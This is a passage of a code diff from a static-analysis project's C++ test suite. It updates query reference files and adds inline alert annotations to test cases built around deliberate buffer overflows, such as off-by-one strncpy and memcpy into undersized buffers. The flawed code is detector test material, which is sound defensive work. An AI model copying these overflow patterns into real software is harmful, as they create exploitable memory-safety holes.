a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref @@ -1 +1,2 @@ -Critical/OverflowDestination.ql \ No newline at end of file +query: Critical/OverflowDestination.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref index 9ff1c3b33dc5..93d88e7802a0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref @@ -1 +1,2 @@ -Critical/OverflowStatic.ql \ No newline at end of file +query: Critical/OverflowStatic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref index f6c962c1a7b4..18ae0f2a567b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref index 757d1592e830..ba8f6a96a1fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWriteFloat.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWriteFloat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected index 3a2b7372831d..b81401816205 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected @@ -1,3 +1,19 @@ +#select +| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | +| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | +| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | +| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | +| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | +| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | +| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | +| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. | test.cpp:187:22:187:27 | string | string | +| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. | test.cpp:195:22:195:27 | string | string | +| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | +| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | +| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | +| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | +| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | +| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | edges | test.cpp:16:11:16:21 | **mk_string_t [string] | test.cpp:39:21:39:31 | *call to mk_string_t [string] | provenance | | | test.cpp:18:5:18:7 | *str [post update] [string] | test.cpp:19:5:19:7 | *str [string] | provenance | | @@ -108,19 +124,3 @@ nodes subpaths | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [Return] [string] | test.cpp:242:16:242:19 | set_string output argument [string] | | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [string] | test.cpp:242:16:242:19 | set_string output argument [string] | -#select -| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | -| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | -| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | -| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | -| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | -| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | -| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | -| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. | test.cpp:187:22:187:27 | string | string | -| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. | test.cpp:195:22:195:27 | string | string | -| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | -| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | -| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | -| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | -| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | -| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref index 1a418e6abc6a..8ea70c432a1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-119/OverrunWriteProductFlow.ql \ No newline at end of file +query: Security/CWE/CWE-119/OverrunWriteProductFlow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref index bf0bf1ea7d05..3a2ef158d3d6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StrncpyFlippedArgs.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StrncpyFlippedArgs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected index e217064d1dfc..58f42bec0c84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref index 767f2ea4db9d..36c47957d339 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/UnboundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/UnboundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp index ca6ca9a5c5a8..afba134ead8a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp @@ -15,7 +15,7 @@ typedef struct string_t *mk_string_t(int size) { string_t *str = (string_t *) malloc(sizeof(string_t)); - str->string = malloc(size); + str->string = malloc(size); // $ Source[cpp/overrun-write] str->size = size; return str; } @@ -39,7 +39,7 @@ void test3(unsigned size, char *buf, unsigned anotherSize) { string_t *str = mk_string_t(size); strncpy(str->string, buf, str->size); // GOOD - strncpy(str->string, buf, str->size + 1); // BAD + strncpy(str->string, buf, str->size + 1); // BAD // $ Alert[cpp/overrun-write] strncpy(str->string, buf, size); // GOOD strncpy(str->string, buf, size + 1); // BAD [NOT DETECTED] @@ -69,7 +69,7 @@ void test3(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= str->size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 1) { @@ -77,7 +77,7 @@ void test3(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= str->size + 2) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 2) { @@ -144,16 +144,16 @@ void test4(unsigned size, char *buf, unsigned anotherSize) { void test5(unsigned size, char *buf, unsigned anotherSize) { string_t *str = (string_t *) malloc(sizeof(string_t)); - str->string = malloc(size - 1); + str->string = malloc(size - 1); // $ Source[cpp/overrun-write] str->size = size - 1; strncpy(str->string, buf, str->size); // GOOD strncpy(str->string, buf, str->size - 1); // GOOD - strncpy(str->string, buf, str->size + 1); // BAD + strncpy(str->string, buf, str->size + 1); // BAD // $ Alert[cpp/overrun-write] - strncpy(str->string, buf, size); // BAD + strncpy(str->string, buf, size); // BAD // $ Alert[cpp/overrun-write] strncpy(str->string, buf, size - 1); // GOOD - strncpy(str->string, buf, size + 1); // BAD + strncpy(str->string, buf, size + 1); // BAD // $ Alert[cpp/overrun-write] if(anotherSize < str->size) { strncpy(str->string, buf, anotherSize); // GOOD @@ -172,7 +172,7 @@ void test5(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= size) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size - 1) { @@ -184,7 +184,7 @@ void test5(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize < size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize < size - 1) { @@ -192,19 +192,19 @@ void test5(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= str->size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= str->size + 2) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 2) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } } @@ -238,16 +238,16 @@ void set_string(string_t* p_str, char* buffer) { void test_flow_through_setter(unsigned size) { string_t str; - char* buffer = (char*)malloc(size); + char* buffer = (char*)malloc(size); // $ Source[cpp/overrun-write] set_string(&str, buffer); - memset(str.string, 0, size + 1); // BAD + memset(str.string, 0, size + 1); // BAD // $ Alert[cpp/overrun-write] } void* my_alloc(unsigned size); void foo(unsigned size) { - int* p = (int*)my_alloc(size); // BAD - memset(p, 0, size + 1); + int* p = (int*)my_alloc(size); // BAD // $ Source[cpp/overrun-write] + memset(p, 0, size + 1); // $ Alert[cpp/overrun-write] } void test6(unsigned long n, char *p) { @@ -259,11 +259,11 @@ void test6(unsigned long n, char *p) { } void test7(unsigned n) { - char* p = (char*)malloc(n); + char* p = (char*)malloc(n); // $ Source[cpp/overrun-write] if(!p) { p = (char*)malloc(++n); } - memset(p, 0, n); // GOOD [FALSE POSITIVE] + memset(p, 0, n); // GOOD [FALSE POSITIVE] // $ Alert[cpp/overrun-write] } void test8(unsigned size, unsigned src_pos) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp index 61b69d951858..1806be58d7d6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp @@ -168,8 +168,8 @@ void CWE122_Heap_Based_Buffer_Overflow__c_CWE805_char_memcpy_01_bad() memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - memcpy(data, source, 100*sizeof(char)); - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + memcpy(data, source, 100*sizeof(char)); // $ Alert[cpp/overflow-buffer] + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); free(data); } @@ -189,8 +189,8 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_declare_memcpy_01_bad() memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */ - memcpy(data, source, 100*sizeof(char)); - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + memcpy(data, source, 100*sizeof(char)); // $ Alert[cpp/overflow-buffer] + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -209,8 +209,8 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_alloca_memcpy_01_bad() memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */ - memcpy(data, source, 100*sizeof(char)); - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + memcpy(data, source, 100*sizeof(char)); // $ Alert[cpp/overflow-buffer] + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -234,7 +234,7 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_alloca_loop_01_bad() { data[i] = source[i]; } - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -258,7 +258,7 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_declare_loop_01_bad() { data[i] = source[i]; } - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -287,7 +287,7 @@ namespace CWE122_Heap_Based_Buffer_Overflow__cpp_CWE193_wchar_t_ncpy_01 wchar_t source[10+1] = SRC_STRING; /* Copy length + 1 to include NUL terminator from source */ /* POTENTIAL FLAW: data may not have enough space to hold source */ - wcsncpy(data, source, wcslen(source) + 1); + wcsncpy(data, source, wcslen(source) + 1); // $ Alert[cpp/bad-strncpy-size] printWLine(data); delete [] data; } @@ -303,7 +303,7 @@ namespace CWE122_Heap_Based_Buffer_Overflow__cpp_CWE193_wchar_t_ncpy_01 wchar_t source[10+1] = SRC_STRING; /* Copy length + 1 to include NUL terminator from source */ /* POTENTIAL FLAW: data may not have enough space to hold source */ - wcsncpy(data, source, wcslen(source) + 1); // [FALSE POSITIVE RESULT] (debatable) + wcsncpy(data, source, wcslen(source) + 1); // [FALSE POSITIVE RESULT] (debatable) // $ Alert[cpp/bad-strncpy-size] printWLine(data); delete [] data; } @@ -347,7 +347,7 @@ namespace CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_char_ncat_01 memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than sizeof(data)-strlen(data) */ - strncat(data, source, 100); + strncat(data, source, 100); // $ Alert[cpp/badly-bounded-write] printLine(data); delete [] data; } @@ -381,7 +381,7 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE131_memcpy_01_bad() { int source[10] = {0}; /* POTENTIAL FLAW: Possible buffer overflow if data was not allocated correctly in the source */ - memcpy(data, source, 10*sizeof(int)); + memcpy(data, source, 10*sizeof(int)); // $ Alert[cpp/overflow-buffer] printIntLine(data[0]); } } @@ -431,7 +431,7 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_loop_01_bad() { data[i] = source[i]; } - data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ + data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printWLine(data); delete [] data; } @@ -449,8 +449,8 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_ncpy_01_bad() wmemset(source, L'C', 100-1); /* fill with L'C's */ source[100-1] = L'\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - wcsncpy(data, source, 100-1); - data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ + wcsncpy(data, source, 100-1); // $ Alert[cpp/bad-strncpy-size] Alert[cpp/badly-bounded-write] + data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printWLine(data); delete [] data; } @@ -478,7 +478,7 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_snprintf_01_bad() wmemset(source, L'C', 100-1); /* fill with L'C's */ source[100-1] = L'\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - SNPRINTF(data, 100, L"%s", source); + SNPRINTF(data, 100, L"%s", source); // $ Alert[cpp/badly-bounded-write] printWLine(data); delete [] data; } @@ -627,7 +627,7 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_snprintf_31_bad() wmemset(source, L'C', 100-1); /* fill with L'C's */ source[100-1] = L'\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - SNPRINTF(data, 100, L"%s", source); + SNPRINTF(data, 100, L"%s", source); // $ Alert[cpp/badly-bounded-write] printWLine(data); delete [] data; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref index 9636c74d0a8f..76b6e5900218 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/BadlyBoundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/BadlyBoundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/BadlyBoundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref index d934901f174f..0e9b8f83382e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OffsetUseBeforeRangeCheck.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql \ No newline at end of file +query: Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref index 5c2bacec579f..bb308ea4b215 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowBuffer.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-119/OverflowBuffer.ql \ No newline at end of file +query: Security/CWE/CWE-119/OverflowBuffer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected index d91379737073..142a9b4c59e5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.expected @@ -1,3 +1,8 @@ +#select +| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | +| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | edges | main.cpp:6:27:6:30 | **argv | main.cpp:7:33:7:36 | **argv | provenance | | | main.cpp:7:33:7:36 | **argv | overflowdestination.cpp:23:45:23:48 | **argv | provenance | | @@ -34,8 +39,3 @@ nodes | overflowdestination.cpp:76:30:76:32 | *src | semmle.label | *src | subpaths | overflowdestination.cpp:75:30:75:32 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:50:52:50:54 | *src | overflowdestination.cpp:75:30:75:32 | overflowdest_test2 output argument | -#select -| overflowdestination.cpp:30:2:30:8 | call to strncpy | main.cpp:6:27:6:30 | **argv | overflowdestination.cpp:30:17:30:20 | *arg1 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:46:2:46:7 | call to memcpy | overflowdestination.cpp:43:8:43:10 | fgets output argument | overflowdestination.cpp:46:15:46:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:53:2:53:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:53:15:53:17 | *src | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | -| overflowdestination.cpp:64:2:64:7 | call to memcpy | overflowdestination.cpp:73:8:73:10 | fgets output argument | overflowdestination.cpp:64:16:64:19 | *src2 | To avoid overflow, this operation should be bounded by destination-buffer size, not source-buffer size. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref index a4213e22fcd7..0e0d1d3792de 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowDestination.qlref @@ -1 +1,2 @@ -Critical/OverflowDestination.ql \ No newline at end of file +query: Critical/OverflowDestination.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref index 9ff1c3b33dc5..93d88e7802a0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverflowStatic.qlref @@ -1 +1,2 @@ -Critical/OverflowStatic.ql \ No newline at end of file +query: Critical/OverflowStatic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref index f6c962c1a7b4..18ae0f2a567b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/semmle/tests/OverrunWrite.qlref +++ 